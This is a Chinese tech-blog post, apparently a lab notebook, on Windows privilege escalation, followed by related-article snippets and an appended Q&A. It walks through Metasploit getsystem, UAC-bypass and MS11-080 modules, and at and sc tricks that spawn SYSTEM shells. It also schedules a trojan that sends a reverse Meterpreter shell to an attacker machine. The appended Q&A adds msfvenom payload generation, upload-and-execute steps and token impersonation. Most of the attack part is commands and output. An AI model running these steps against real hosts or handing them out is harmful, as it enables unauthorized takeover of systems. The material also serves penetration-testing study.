windows提权—msf、at、sc提权

最新推荐文章于 2025-03-28 19:42:05 发布
最新推荐文章于 2025-03-28 19:42:05 发布
阅读量817 收藏
点赞数 1
分类专栏: 渗透测试 后渗透 文章标签: windows 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/negnegil/article/details/120227350
版权

msf提权

适用版本:windows 2k3、xp

获取到服务器的 meterpreter 后,有三个方向

  • getsystem提权

可以直接使用 getsystem 提权
没成功
在这里插入图片描述

  • 绕过UAC策略

MSF使用注册表 bypass uac 提权
漏洞模块:

exploit/windows/local/ask
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection

操作:

use exploit/windows/local/ask
options
set session 4     //3被占用了
set TECHNIQUE EXE
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.109
set lport 4444
exploit

未成功
在这里插入图片描述

  • 使用漏洞提权
meterpreter > run post/windows/gather/enum_patches

显示Q147222已被安装
在这里插入图片描述

复制到在线补丁对比平台

http://bugs.hacking8.com/tiquan/

在这里插入图片描述

在这里插入图片描述

或者使用getroot-tools 查看未打补丁
下载地址:

https://github.com/5z1punch/GetRoot-Tools

在这里插入图片描述

使用MS11-080

search MS11-080
use exploit/windows/local/ms11_080_afdjoinleaf
set session 4
exploit

at 命令提权

适用系统:Windows2000、Windows 2003、Windows XP
前提:获得服务器admin权限,可以使用at命令,由此提权为system权限

at 是一个发布定时任务计划的命令行工具,语法比较简单。通过 at 命令发布的
定时任务计划, Windows 默认以 SYSTEM 权限运行。定时任务计划可以是批处理、可以是一个二进制文件

提权操作
定时开启一个cmd的shell

##通过 /interactive 开启界面交互模式
at 16.40 /interactive "cmd.exe"

在这里插入图片描述

现在我们只是获得了一个system的shell,要把系统提权到system权限才行
在得到一个system的cmd之后,使用taskmgr命令调用任务管理器,此时的
任务管理器是system权限,然后kill掉explore进程,再使用任务管理器
新建explore进程,将会得到一个system的桌面环境

C:\WINDOWS\system32\taskmgr

杀掉explore进程
在这里插入图片描述

再重新打开explorer进程
在这里插入图片描述

现在就是system权限了
在这里插入图片描述

MSF中at提权
思路:使用at命令执行木马反弹shell,攻击机上获得的shell时system权限

靶机:

at 17:34 /interactive "C:\wmpub\shell.exe"

在这里插入图片描述

kali

msf6>use exploit/multi/handler
msf6>set payload windows/meterpreter/reverse_tcp
msf6>set lhost 192.168.0.109
msf6>set lport 4444
msf6>exploit

提权成功
在这里插入图片描述

SC提权

适用版本(win7、8、08、12、16)
前提:获得服务器admin权限,可以使用at命令,由此提权为system权限

##CMD下

#配置一个服务syscmd
C:>sc Create syscmd binPath= “cmd /K start” type= own type= interact 
#启动服务获取system权限的cmd
C:>sc start syscmd

其中syscmd是服务名称,可以随意填写,binpath是启动的命令,type=own是指服务这个服务属于谁,type=interact是指交互式shell

此时就以system权限打开了一个cmd,然后和at提权的后续做法相同,使用taskmgr命令调用任务管理器,此时的任务管理器是system权限,然后kill掉explore进程,再使用任务管理器新建explore进程,将会得到一个system的桌面环境

权—Win漏洞及数据库&AT&SC&PS
m0_61506558的博客
10-12 812
最近在上计算机组成原理的时候接触到了数据溢出,之前也接触过一点,对于PWN选手研究的会比较深,通过本篇文章,整理的常用方法.当你通过弱口令爆破、敏感文件读取、sql注入等漏洞获取到了管理员的账号和密码登入后台以后,需要升自己的限,就得在后台页面中寻找漏洞利用的点,成功上传webshell限.(一)限介绍​ 可分为纵向与横向:纵向:低限角色获得高限角色的限;横向:获取同级别角色的限。
windows系统
liweh的博客
07-18 365
1、内核溢出windows系统获取补丁: systeminfo或wmic qfe辅助工具: Windows-Exploit-Suggester(现在因为漏洞库不再更新,所以已经基本弃用systeminfo在windows系统上可以显示系统的各种信息主机名: WIN-AJC75HUE5HCOS 名称: Microsoft Windows Server 2008 R2 Standard。
Kali linux 学习笔记(二十一)权——本地atsc、Sysinternals Suite 套件、注入进程) 2020.3.3
闵行小鱼塘
03-03 1803
初步控制目标机后,要限,本节简单介绍几种本地方法
windows本地--AT&SC&PS命令&进程迁移注入
金灰的博客
04-22 821
免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等......本地--->system。
kali利用msf渗透Windows电脑测试
最新发布
2403_90011488的博客
03-28 1093
MSF集成了数千个已知的软件漏洞利用模块,支持针对不同平台(如Windows、Linux)和服务(如SMB)的漏洞攻击。例如,著名的永恒之蓝漏洞 (MS17_010)就是通过MSF进行利用的。
本地用户-AT&SC&PS命令
weixin_45701675的博客
11-18 658
at命令的原理 at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system限。 适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除. 当我们拿到低限的用户,通过连接上服务器后,可以通过at命令来进行本地。 测试主机:win2003 at 11:00 /interactive cmd (在11:00分生成一个交互式的System限的cmd) 如果设定时间过时,将于次日执行。 system成功 ..
joosonmao的专栏
04-15 1722
用http://www.microsoft.com/china/technet/sysinternals/utilities/pstools.mspx的PsExec升explorer限,或升cmd限在命令示符下删 1.PsExec命令升进程特 我们可以借助PsExec命令工具以SYSTEM身份运行进程。我们已经知道只有SYSTEM帐户才能访问C:\System Volume
cmd+lcx+nc+sc工具总结
JackLiu16的博客
02-28 1294
lcx:端口映射工具1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器...
升-Windows本地-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1608
进程迁移注入就是将获取到限低的进程注入至进程中限高的中,这样就实现了升,同时注入进程相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的限,数据库的增删改等,源码或配置文件泄漏,也可能是网站限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
windows总结
m0_52329625的博客
01-08 1375
自己总结学习的一些Windows思路,借鉴了许多网上公开的教程思路总结的一篇文章
windows升——ATSC、PS命令
W小哥
11-25 6146
一、AT命令 适用范围: Windows2000、Windows 2003、Windows XP 1.1 AT命令简介 AT命令是Windows XP中内置的命令,它也可以媲美Windows中的“计划任务”,而且在计划的安排、任务的管理、工作事务的处理方面,AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。 因为AT命令默认是以system限下运行的所以我们可以利用以下命令,进行。 1.2 AT命令实验 系统:windows2003 命令: at 13:38
Day59升-win溢出漏洞AT&SC&ps
san3144393495的博客
12-02 1146
案列一,演示的是溢出漏洞,思路是先利用systeminfo进行信息收集,然后开始筛选漏洞出来,然后用特有工具或者exp,拿下西瓜。案例二,有一些是不适应webshell,这也是为什么本地比web大的原因,一些运行画家和数据的回显状态,成功几率就会低。有些漏洞就只适合在本地。案列三,有一些不是漏洞,但也能,有操作系统版本上的区别。是对面系统上的设计逻辑造成的问题。第三方。facai。
【安全牛学习笔记】
edu_aqniu的博客
10-30 2168
Windows • user • Administrator • System Linux • User • Root windows 将admin为system net user命令  查看账户 Guest 用户,限很小 HelpAssistant 用户,远程协助账号 Windows system账号 • 系
升】Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
今天是几号的博客
02-20 991
适用版本:windows 7、8、03、08、12、16。当我们拿到低限的用户(webshell用户不能创建计划命令),通过连接上服务器后,可以通过at命令来进行本地。适用版本:Test in Win2012 and Win2008 & Win2016 其他未测 基本可以。适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除.at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system限。#创建一个名叫syscmd的新的交互式的cmd执行服务。
windowsat&sc&ps&进程注入&令牌窃取
m0_62207170的博客
03-20 865
windowsat&sc&ps&进程注入&令牌窃取
升 - Win 溢出漏洞及 AT&SC&PS 解析
m0_57836225的博客
11-14 789
Win 溢出漏洞Windows 操作系统由于其广泛的应用和复杂的代码结构,可能存在一些溢出漏洞。这些漏洞通常是由于程序在处理数据时没有正确地验证输入数据的长度或边界,导致数据溢出到相邻的内存区域。当攻击者能够利用这些漏洞时,可能会破坏系统的正常运行,甚至获取更高的限。例如,缓冲区溢出漏洞可能允许攻击者在目标系统上执行恶意代码。AT&SC&PS AT 命令在 Windows 中曾用于计划任务,攻击者可能利用 AT 命令的一些特性或漏洞来限。
win升(非常详细)零基础入门到精通,收藏这一篇就够了
Python_0011的博客
03-26 2507
介绍:sc.exe为服务控制管理service control manager,用于对计算机的系统服务进行管理,实现注册,运行,暂停,自启等基础操作,用户能够将符合Windows系统服务化条件的程序进行本地系统后台服务化运行,注册到服务注册表目录下的程序,通过sc的指令实现程序执行状态的切换和管理。这里有一点要注意,网上公开的exp也是别人写好的,如果使用后没有效果,不一定是服务器上没有这个漏洞,可能是环境的问题,作者在它当时的环境下可能可以成功,所以如果遇到失败可以多换几个POC。
以SYSTEM用户运行CMD
weixin_33936401的博客
08-12 738
SCCM 经常会以NT AUTHOR\SYSTEM帐户操作。 安以下步骤可以以SYSTEM帐户打开一个CMD窗口。 1. 从微软网站下载PSTool。 2. 以管理员运行CMD,进入到解压的PSTool目录。 3. 运行psexec -i -s cmd.exe 4. 在新打开的CMD中运行wh...
CISP-PTE维持记录(2022-03-30)
orange777
03-30 7954
0x00前言 初考CIST-PTE是在2019年,今天做了下维持,对其中的一些题目做下记录。其实这些题目基本上都是在网上可以找到的,其中标注的答案部分有极个别可能有误,请慎重! 这里说下题型分布,选择题40个,80分;实操题2个,20分。总分100,>=70即可拿证。下面开始吧 0x01选择题 1、()是最常用的公钥密码算法 (2分) A 量子密码B DSAC RSAD 椭圆曲线 2、通过修改HTTP Headers 中的哪个键值可以伪造来源网址() (2分) A User-AgentB Accept
windows msf
03-08
### 使用 Metasploit Framework 在 Windows 系统上进行操作 #### 准备工作 为了在 Windows 系统上使用 Metasploit Framework (MSF) 进行,需先确保 MSF 已安装并配置好。此外,还需具备对目标系统的初步访问限,通常通过已有的 Meterpreter 会话获得。 #### 创建攻击载荷 可以借助 `msfvenom` 来创建适用于特定场景下的恶意软件载荷。对于 Windows 而言,可能涉及生成一个能够绕过现有安全机制的可执行文件或 DLL 文件[^1]。 ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=<Port> -f exe > shell.exe ``` 此命令将生成一个反向 TCP 的 Meterpreter 载荷,并保存为 `shell.exe` 文件。 #### 配置本地监听器 一旦拥有可用于投放的载荷,下一步是在攻击者控制的机器上设置一个监听器等待连接回传。这可通过启动一个多处理程序 (`multi/handler`) 实现: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <Your_IP> exploit ``` 上述 Ruby 代码片段展示了如何配置 Metasploit 多处理器以接收来自被感染主机的回调请求[^4]。 #### 上载与执行载荷 假设已经有一个低特级别的 Meterpreter 会话可用,则可以直接利用该通道传输之前准备好的二进制文件至受害者的磁盘空间内;之后再调用相应的命令示符来触发其运行过程。 ```python meterpreter > upload /path/to/shell.exe C:\temp\32.exe meterpreter > execute -H -f C:\temp\32.exe ``` 这里展示的是怎样把名为 `32.exe` 的自定义 PE 文件放置于远程计算机上的临时位置,并立即启动它以便建立新的通信链路[^3]。 #### 应用技术 当获得了初始的 Meterpreter 访问后,便可以根据实际情况选用不同的策略尝试升当前用户的限级别。比如,如果怀疑存在某些未修补的服务漏洞或是弱密码账户的话,那么就可以针对性地加载对应的辅助模块来进行探测和利用活动。 ```ruby meterpreter > getuid server1\target_user meterpreter > load incognito [*] Loading extension incognito... meterpreter > list_tokens -u meterpreter > impersonate_token domain\administrator ``` 上面的例子说明了如何切换到更高限的身份令牌从而实现无缝转换成管理员角色的操作环境。 #### 后续行动 成功取得高限后,可根据具体需求继续开展后续的任务,如搜集敏感资料、部署持久化组件或者是实施横向扩展等行为。值得注意的是,在整个过程中务必谨慎行事以免引起不必要的注意或者破坏证据链条。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值